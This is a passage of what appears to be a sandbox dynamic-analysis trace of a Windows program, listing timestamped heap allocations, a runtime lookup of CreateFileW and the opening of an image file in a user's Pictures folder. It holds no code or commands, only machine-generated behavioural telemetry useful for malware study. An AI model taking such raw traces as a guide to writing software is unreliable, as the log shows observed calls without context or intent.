RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0091.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2290 [0091.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2290 | out: hHeap=0x1780000) returned 1 [0091.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2290 [0091.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0091.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21a0 [0091.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0091.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9c80 [0091.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0091.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0091.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0091.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9dd0 | out: hHeap=0x1780000) returned 1 [0091.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf630 [0091.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0091.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0091.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0091.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0091.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0091.168] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0091.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0091.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0091.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0091.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0091.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21a0 [0091.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0091.168] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2150 [0091.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0091.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0091.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bc0 [0091.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2150 [0091.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e78 [0091.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0091.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0091.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0091.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0091.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0091.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bd8 | out: hHeap=0x1780000) returned 1 [0091.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391c08 [0091.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bd8 [0091.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0091.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0091.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0091.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0091.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0091.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0091.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0091.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca0d0 [0091.169] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0091.169] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0091.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0091.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0091.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0091.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0091.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0091.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca160 [0091.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0091.170] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0091.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0091.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0091.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2330 [0091.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca178 [0091.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0091.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0091.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e90 | out: hHeap=0x1780000) returned 1 [0091.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0091.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e90 [0091.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2490 [0091.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ef0 [0091.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2490 | out: hHeap=0x1780000) returned 1 [0091.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f08 [0091.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0091.170] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0091.170] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0091.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0091.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0091.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0091.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0091.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0091.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0091.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0091.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0091.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0091.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0091.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0091.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0091.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0091.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0091.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0091.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0091.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0091.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0091.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0091.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0091.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0091.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0091.171] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0091.171] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0091.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0091.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0091.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0091.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0091.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0091.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0091.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0091.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0091.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0091.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0091.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0091.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0091.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0091.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0091.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0091.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0091.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0091.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0091.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0091.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0091.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0091.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0091.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0091.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0091.172] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0091.172] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0091.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0091.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0091.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0091.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0091.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0091.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0091.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2450 [0091.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0091.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2490 [0091.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0091.173] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0091.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0091.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0091.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0091.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0091.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0091.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0091.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0091.173] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0091.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0091.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0091.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0091.173] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0091.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0091.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0091.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0091.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0091.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0091.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0091.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0091.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0091.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0091.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0091.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0091.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0091.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2450 | out: hHeap=0x1780000) returned 1 [0091.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0091.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0091.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2450 [0091.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0091.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0091.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0091.174] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0091.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0091.174] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0091.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0091.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0091.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0091.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0091.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0091.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0091.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0091.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0091.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0091.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0091.175] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0091.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24f0 [0091.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0091.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0091.175] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0091.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0091.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0091.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0091.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0091.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0091.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0091.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0091.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0091.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0091.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0091.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0091.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0091.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0091.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0091.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0091.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0091.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0091.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0091.176] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0091.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0091.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0091.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0091.176] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0091.177] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0091.177] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0091.177] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0091.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.177] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca250 [0091.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca250, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0091.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0091.177] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0091.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0091.177] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0091.177] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0091.177] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2340 [0091.177] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2350 [0091.178] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0091.178] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0091.178] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0091.178] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0091.178] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0091.178] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0091.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2340 | out: hHeap=0x1780000) returned 1 [0091.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0091.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0091.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0091.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0091.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0091.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0091.178] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0091.178] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\YwIpia.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\ywipia.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x258 [0091.178] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0091.178] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eab80 [0091.178] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0091.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0091.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0091.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0091.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0091.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0091.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0091.179] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0091.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0091.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0091.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0091.179] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0091.179] 